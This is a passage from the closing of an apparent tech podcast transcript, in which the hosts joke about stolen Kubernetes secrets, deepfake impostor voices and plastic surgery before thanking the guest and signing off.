the subject, even if they're not getting into the deep details of it, keeping it on people's
mind is the first thing, you know, just like safety and anything, keep it in your mind.
You're aware of it.
You're going to start thinking of it more and maybe not get your secrets on
your Kubernetes cluster stolen from Andy. And you know what, Andy,
I should have known you talked about meeting people in public.
I should have known when I heard your weird voice in the alley that it wasn't
really you, that it was some imposter, Andy, who had my kids.
Clearly because we haven't seen each other in real life for too many years
and maybe I've completely changed.
Maybe, because I can't see you right now.
I know.
Anyhow. All the deep fakes.
Andy went for plastic surgery.
He went out to LA and got hooked.
Yeah, I got more hair. Maybe I should do this.
If you see me next time and I have more hair
here on my forehead,
then I'll do this as well.
Alright. Well, thank you,
Stefan. Thank you, Andy, for
setting this up. As always, it's
really appreciative of the fascinating topics
and I hope our listeners are too.
So thank you, everybody, for listening
and talk to you next time. Thanks.
Thank you. Thank you.
Thank you.